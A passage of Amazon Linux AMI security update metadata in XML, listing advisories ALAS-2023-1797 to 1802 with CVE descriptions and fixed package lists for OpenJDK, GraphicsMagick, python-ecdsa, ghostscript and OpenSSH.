arch="x86_64"><filename>Packages/cups-php-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1797</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1797: medium priority package update for java-1.8.0-openjdk</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22049:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-22045:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2023-22043:
Vulnerability in Oracle Java SE (component: JavaFX). The supported version that is affected is Oracle Java SE: 8u371. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).
CVE-2023-21968:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-21967:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
CVE-2023-21954:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
CVE-2023-21939:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-21938:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-21937:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21937" title="" id="CVE-2023-21937" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21938" title="" id="CVE-2023-21938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21939" title="" id="CVE-2023-21939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21954" title="" id="CVE-2023-21954" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21967" title="" id="CVE-2023-21967" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21968" title="" id="CVE-2023-21968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22043" title="" id="CVE-2023-22043" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22045" title="" id="CVE-2023-22045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22049" title="" id="CVE-2023-22049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.78.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.78.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1798</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1798: important priority package update for java-1.8.0-openjdk</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-21930:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21930" title="" id="CVE-2023-21930" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.372.b07-1.76.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.372.b07-1.76.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1799</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1799: important priority package update for GraphicsMagick</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1270:
In GraphicsMagick, a heap buffer overflow was found when parsing MIFF.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1270" title="" id="CVE-2022-1270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.32" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.32-1.17.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.32-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1800</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1800: important priority package update for python-ecdsa</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14859:
A flaw was found in all python-ecdsa versions before 0.13.3, where it did not correctly verify whether signatures used DER encoding. Without this verification, a malformed signature could be accepted, making the signature malleable. Without proper verification, an attacker could use a malleable signature to create false transactions.
CVE-2019-14853:
An error-handling flaw was found in python-ecdsa before version 0.13.3. During signature decoding, malformed DER signatures could raise unexpected exceptions (or no exceptions at all), which could lead to a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14853" title="" id="CVE-2019-14853" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14859" title="" id="CVE-2019-14859" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-ecdsa" version="0.11" release="3.4.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-ecdsa-0.11-3.4.amzn1.noarch.rpm</filename></package><package name="python26-ecdsa" version="0.11" release="3.4.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-ecdsa-0.11-3.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1801</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1801: medium priority package update for ghostscript</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-38559:
A buffer overflow flaw was found in base/gdevdevn.c:1973 in devn_pcx_write_rle() in ghostscript. This issue may allow a local attacker to cause a denial of service via outputting a crafted PDF file for a DEVN device with gs.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38559" title="" id="CVE-2023-38559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.29.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.29.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.29.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1802</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1802: important priority package update for openssh</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-38408:
The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if the target user's ssh-agent is forwarded to an attacker-controlled system (the code in /usr/lib is not necessarily safe for loading into ssh-agent). Exploitation can also be prevented by starting ssh-agent with an empty PKCS#11/FIDO allowlist (ssh-agent -P '') or by configuring an allowlist that contains only specific provider libraries. NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38408" title="" id="CVE-2023-38408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.80.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.80.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.80.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.80.amzn1" 